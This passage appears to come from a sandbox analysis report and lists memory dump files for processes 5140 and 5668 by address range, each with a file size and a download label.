memory/5140-2856-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2847-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/5140-2859-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2837-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/5140-2860-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2861-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2839-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2804-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

Filesize
4KB

Download
memory/5140-2822-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2863-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2865-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2867-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/5140-2848-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2869-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/5140-2870-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/5140-2873-0x0000000004FA0000-0x0000000004FA2000-memory.dmp

Filesize
8KB

Download
memory/5140-2874-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/5140-2879-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/5140-2880-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/5140-2882-0x0000000004F90000-0x0000000004F91000-memory.dmp

Filesize
4KB

Download
memory/5140-2883-0x0000000004FA0000-0x0000000004FA2000-memory.dmp

Filesize
8KB

Download
memory/5140-2884-0x0000000004FA0000-0x0000000004FA2000-memory.dmp

Filesize
8KB

Download
memory/5140-2818-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2857-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2877-0x0000000004FB0000-0x0000000004FB2000-memory.dmp

Filesize
8KB

Download
memory/5140-2876-0x0000000004FB0000-0x0000000004FB2000-memory.dmp

Filesize
8KB

Download
memory/5140-2871-0x0000000004FA0000-0x0000000004FA2000-memory.dmp

Filesize
8KB

Download
memory/5140-2864-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2862-0x0000000004F80000-0x0000000004F81000-memory.dmp

Filesize
4KB

Download
memory/5140-2838-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/5140-2828-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/5140-2819-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2829-0x0000000003150000-0x0000000003155000-memory.dmp

Filesize
20KB

Download
memory/5140-2830-0x0000000003150000-0x0000000003155000-memory.dmp

Filesize
20KB

Download
memory/5140-2846-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2801-0x0000000003C60000-0x0000000004460000-memory.dmp

Filesize
8.0MB

Download
memory/5140-2834-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/5140-2836-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/5140-2803-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

Filesize
4KB

Download
memory/5140-2840-0x0000000003130000-0x0000000003134000-memory.dmp

Filesize
16KB

Download
memory/5140-2827-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/5140-2850-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2849-0x0000000004F70000-0x0000000004F71000-memory.dmp

Filesize
4KB

Download
memory/5140-2841-0x0000000003150000-0x0000000003155000-memory.dmp

Filesize
20KB

Download
memory/5140-2842-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/5140-2843-0x0000000003150000-0x0000000003155000-memory.dmp

Filesize
20KB

Download
memory/5140-2844-0x0000000004F60000-0x0000000004F61000-memory.dmp

Filesize
4KB

Download
memory/5668-3277-0x0000000000DB0000-0x0000000001371000-memory.dmp

Filesize
5.8MB

Download
memory/5668-2858-0x0000000000DB0000-0x0000000001371000-memory.dmp

Filesize
5.8MB

Download